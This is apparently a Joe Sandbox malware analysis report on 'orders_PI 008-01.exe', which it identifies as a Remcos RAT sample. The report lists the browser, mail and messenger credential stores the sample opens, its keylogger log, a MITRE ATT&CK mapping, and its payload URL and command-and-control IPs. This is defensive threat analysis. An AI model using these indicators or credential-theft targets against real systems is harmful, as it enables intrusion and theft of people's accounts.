              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: EntryPoint, ESMTPPassword6_2_004033F0
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword6_2_00402DB3
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword6_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: orders_PI 008-01.exe PID: 8112, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: orders_PI 008-01.exe PID: 7460, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-BHLA3TJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3879351770.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: orders_PI 008-01.exe PID: 8112, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		2
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
              Process Injection              		1
              Software Packing              		2
              Credentials in Registry              		3
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		1
              Credentials In Files              		228
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Masquerading              		LSA Secrets241
              Security Software Discovery              		SSH2
              Clipboard Data              		2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Virtualization/Sandbox Evasion              		Cached Domain Credentials2
              Virtualization/Sandbox Evasion              		VNCGUI Input Capture112
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
              Process Injection              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              orders_PI 008-01.exe13%ReversingLabs
              orders_PI 008-01.exe100%AviraHEUR/AGEN.1333748

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nslA6E2.tmp\System.dll0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.imvu.comr0%URL Reputationsafe
              http://www.imvu.com0%URL Reputationsafe
              https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
              http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
              http://geoplugin.net/json.gp0%URL Reputationsafe
              https://login.yahoo.com/config/login0%URL Reputationsafe
              http://www.ebuddy.com0%URL Reputationsafe
              https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LO0%Avira URL Cloudsafe
              https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e590%Avira URL Cloudsafe
              http://geoplugin.net/json.gp#0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingth0%Avira URL Cloudsafe
              https://www.office.com/0%Avira URL Cloudsafe
              https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c30%Avira URL Cloudsafe
              http://www.nirsoft.net0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=wsb0%Avira URL Cloudsafe
              http://212.162.149.38/LnGWkyvzVtM166.bin0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingaotak0%Avira URL Cloudsafe
              http://212.162.149.38/LnGWkyvzVtM166.binV0%Avira URL Cloudsafe
              https://www.google.com0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be7170%Avira URL Cloudsafe
              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingaot0%Avira URL Cloudsafe
              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg0%Avira URL Cloudsafe
              https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe932690%Avira URL Cloudsafe
              http://geoplugin.net/json.gpI0%Avira URL Cloudsafe
              https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpeu0%Avira URL Cloudsafe
              https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp:0%Avira URL Cloudsafe
              https://aefd.nelreports.net/api/report?cat=bingrms0%Avira URL Cloudsafe
              https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
              https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc80%Avira URL Cloudsafe
              http://www.nirsoft.net/0%Avira URL Cloudsafe
              http://geoplugin.net/json.gpV0%Avira URL Cloudsafe
              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&0%Avira URL Cloudsafe
              http://www.imvu.comata0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              		178.237.33.50
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://212.162.149.38/LnGWkyvzVtM166.binfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpfalse
                • URL Reputation: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://www.office.com/bhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gp#orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LObhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3bhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comrorders_PI 008-01.exe, 00000003.00000002.3908240272.0000000034480000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aefd.nelreports.net/api/report?cat=bingthbhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59bhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comorders_PI 008-01.exe, orders_PI 008-01.exe, 00000007.00000003.1760994142.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000003.1761352653.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://aefd.nelreports.net/api/report?cat=wsbbhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.nirsoft.netorders_PI 008-01.exe, 00000005.00000002.1771684606.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://aefd.nelreports.net/api/report?cat=bingaotakbhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://deff.nelreports.net/api/report?cat=msnbhv2901.tmp.5.drfalse
                • URL Reputation: safe
                		unknown
                http://nsis.sf.net/NSIS_ErrorErrororders_PI 008-01.exefalse
                • URL Reputation: safe
                		unknown
                http://212.162.149.38/LnGWkyvzVtM166.binVorders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gp:orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comorders_PI 008-01.exe, 00000003.00000002.3908240272.0000000034480000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.google.comorders_PI 008-01.exe, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEnbhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://aefd.nelreports.net/api/report?cat=bingaotbhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717bhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpIorders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpeuorders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269bhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgbhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96ddbhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://aefd.nelreports.net/api/report?cat=bingrmsbhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.google.com/accounts/serviceloginorders_PI 008-01.exefalse
                • Avira URL Cloud: safe
                		unknown
                https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8bhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://login.yahoo.com/config/loginorders_PI 008-01.exefalse
                • URL Reputation: safe
                		unknown
                http://geoplugin.net/json.gpVorders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.nirsoft.net/orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.imvu.comataorders_PI 008-01.exe, 00000007.00000003.1760994142.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000007.00000003.1761352653.00000000007CD000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.ebuddy.comorders_PI 008-01.exe, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&bhv2901.tmp.5.drfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                212.162.149.38
                		unknownNetherlands
                		64236UNREAL-SERVERSUSfalse
                162.251.122.106
                		unknownCanada
                		64236UNREAL-SERVERSUStrue
                178.237.33.50
                		geoplugin.netNetherlands
                		8455ATOM86-ASATOM86NLfalse

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1548262
                Start date and time:2024-11-04 09:26:06 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 9m 27s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:11
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:orders_PI 008-01.exe
                Detection:MAL
                Classification:mal100.phis.troj.spyw.evad.winEXE@9/15@1/3
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 87%
                • Number of executed functions: 158
                • Number of non-executed functions: 340
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: orders_PI 008-01.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                03:28:07API Interceptor5527092x Sleep call for process: orders_PI 008-01.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                162.251.122.106KZ710-0038.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  178.237.33.50segura.vbsGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  4qmS30qgbA.exeGet hashmaliciousRemcos, AsyncRAT, PureLog StealerBrowse
                  • geoplugin.net/json.gp
                  New_Order_#070824_Order_November-2024-pdf.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  z1ProductSampleRequirement.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  5Tqze.exeGet hashmaliciousRemcosBrowse
                  • geoplugin.net/json.gp
                  PO-33463334788.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • geoplugin.net/json.gp
                  A & C Metrology OC 545714677889Materiale.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                  • geoplugin.net/json.gp
                  QUOTE #46789_AL_JAMEELA24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • geoplugin.net/json.gp

                  Domains

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  geoplugin.netsegura.vbsGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  4qmS30qgbA.exeGet hashmaliciousRemcos, AsyncRAT, PureLog StealerBrowse
                  • 178.237.33.50
                  New_Order_#070824_Order_November-2024-pdf.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  z1ProductSampleRequirement.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  5Tqze.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  PO-33463334788.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  A & C Metrology OC 545714677889Materiale.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                  • 178.237.33.50
                  QUOTE #46789_AL_JAMEELA24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  UNREAL-SERVERSUSPO-33463334788.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 212.162.149.224
                  RFQ_PO_UMQ736-ORDER#MATERIALS-LQKP0489.exeGet hashmaliciousXWormBrowse
                  • 212.162.149.53
                  New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                  • 212.162.149.53
                  OFFER KH-20241024.exeGet hashmaliciousGuLoaderBrowse
                  • 212.162.149.204
                  OFFER KH-20241024.exeGet hashmaliciousGuLoaderBrowse
                  • 212.162.149.204
                  Belialist.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 204.10.160.182
                  SecuriteInfo.com.Win32.Evo-gen.798.4975.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 204.10.160.167
                  Unicredit.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                  • 204.10.160.230
                  nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                  • 204.10.160.167
                  21st OCTOBER 2024 234876sdf ORDER_PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 204.10.160.169
                  UNREAL-SERVERSUSPO-33463334788.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 212.162.149.224
                  RFQ_PO_UMQ736-ORDER#MATERIALS-LQKP0489.exeGet hashmaliciousXWormBrowse
                  • 212.162.149.53
                  New_Order_568330_Material_Specifications.exeGet hashmaliciousAgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWormBrowse
                  • 212.162.149.53
                  OFFER KH-20241024.exeGet hashmaliciousGuLoaderBrowse
                  • 212.162.149.204
                  OFFER KH-20241024.exeGet hashmaliciousGuLoaderBrowse
                  • 212.162.149.204
                  Belialist.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 204.10.160.182
                  SecuriteInfo.com.Win32.Evo-gen.798.4975.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                  • 204.10.160.167
                  Unicredit.Pagamento.pdf.exeGet hashmaliciousRemcosBrowse
                  • 204.10.160.230
                  nicworkgbeeterworkgoodthingswithgereatniceforme.htaGet hashmaliciousCobalt Strike, Remcos, DBatLoaderBrowse
                  • 204.10.160.167
                  21st OCTOBER 2024 234876sdf ORDER_PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  • 204.10.160.169
                  ATOM86-ASATOM86NLsegura.vbsGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  4qmS30qgbA.exeGet hashmaliciousRemcos, AsyncRAT, PureLog StealerBrowse
                  • 178.237.33.50
                  New_Order_#070824_Order_November-2024-pdf.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  1730477226c46d247f8149bb08962a395eff3ba2277df18f1516091fac7e907c6a25be5f0f687.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  z1ProductSampleRequirement.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  17304052250b9baaf5a761ccc772d95d677ec70f56bbae9f30fbbf26b5b71b9b9867fc8bb2802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  5Tqze.exeGet hashmaliciousRemcosBrowse
                  • 178.237.33.50
                  PO-33463334788.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50
                  A & C Metrology OC 545714677889Materiale.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                  • 178.237.33.50
                  QUOTE #46789_AL_JAMEELA24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                  • 178.237.33.50

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\AppData\Local\Temp\nslA6E2.tmp\System.dllRemotePCViewer.exeGet hashmaliciousUnknownBrowse
                    8737738_19082024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                      8737738_19082024.vbsGet hashmaliciousGuLoaderBrowse
                        Dhl Delivery(AWB 9849791014).exeGet hashmaliciousGuLoaderBrowse
                          Dhl Delivery(AWB 9849791014).exeGet hashmaliciousGuLoaderBrowse
                            89.htaGet hashmaliciousCobalt Strike, GuLoaderBrowse
                              sahost.exeGet hashmaliciousGuLoaderBrowse
                                HSBC Advice_ACH_Credit_08082024 (1).xlsGet hashmaliciousGuLoaderBrowse
                                  sahost.exeGet hashmaliciousGuLoaderBrowse
                                    sahost.exeGet hashmaliciousGuLoaderBrowse

                                      Created / dropped Files

                                      C:\Program Files (x86)\Common Files\kvindagtigt.ini

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):52
                                      Entropy (8bit):4.0121618346445365
                                      Encrypted:false
                                      SSDEEP:3:BPi4YDgAmcAKDHMnhv:BPiBkAmc0nhv
                                      MD5:F298228D2D42CED0A00B0C5320000835
                                      SHA1:FB06F02DDCDA4C9EC752A688EE617064DB3A49EB
                                      SHA-256:E399AFE89F97EAE7BCDAE626913DA1618F4F42BA11887217CDBF524720532AB2
                                      SHA-512:464DA89F9E1D5935810443B20C3D19F77585D964DF89F5CB427482A03C8EF6274D06CBC01533D92C691FFD55E1725BA5F427D023A45A5128BCED0EEE11E083FE
                                      Malicious:false
                                      Reputation:low
                                      Preview:[skaaltalerens]..nonsaleability=sammenstuvningerne..

                                      C:\ProgramData\remcos\logs.dat

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):144
                                      Entropy (8bit):3.38816599775145
                                      Encrypted:false
                                      SSDEEP:3:rhlKlfeLJfU5JWRal2Jl+7R0DAlBG45klovDl6v:6lfQ+5YcIeeDAlOWAv
                                      MD5:5B22817491229961BAD6256F13694638
                                      SHA1:1A6E05349740775F3EFCE421F30E5557EEC9071C
                                      SHA-256:3378F38BBD09007A3337ECF6CFD67484FE9E4B20B56258E9F0ACE80D014230D8
                                      SHA-512:079E0A6200BAD7577D17BA1869547488994DFBD17D7845E4D891950DFD4FAE2E00D7CABDAA728271139DE8B7D271D191E229DACA87B198870A4ECF4C5743C745
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                      Reputation:low
                                      Preview:....[.2.0.2.4./.1.1./.0.4. .0.3.:.2.7.:.3.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\json[1].json

                                      Download File
                                      Process:C:\Users\user\Desktop\orders_PI 008-01.exe
                                      File Type:JSON data
                                      Category:dropped
                                      Size (bytes):957
                                      Entropy (8bit):5.008571958992753
                                      Encrypted:false
                                      SSDEEP:24:qkdVauKyGX85jHf3SvXhNlT3/7YvfbYro:pba0GX85mvhjTkvfEro
                                      MD5:B1F05BD1D9797A053BD883B79053E83F
                                      SHA1:A50F7AD9ACAD761C41ADF29105B13A9F1E2C33E4
                                      SHA-256:9B2A81AEA54244C5FA7784627B5CD957FCFA65BCC07E6806CDE4138B8BFD9916
